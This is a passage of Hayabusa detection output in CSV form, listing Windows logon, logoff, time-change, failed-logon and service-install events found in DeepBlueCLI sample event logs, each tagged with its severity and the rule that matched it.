0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 
0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
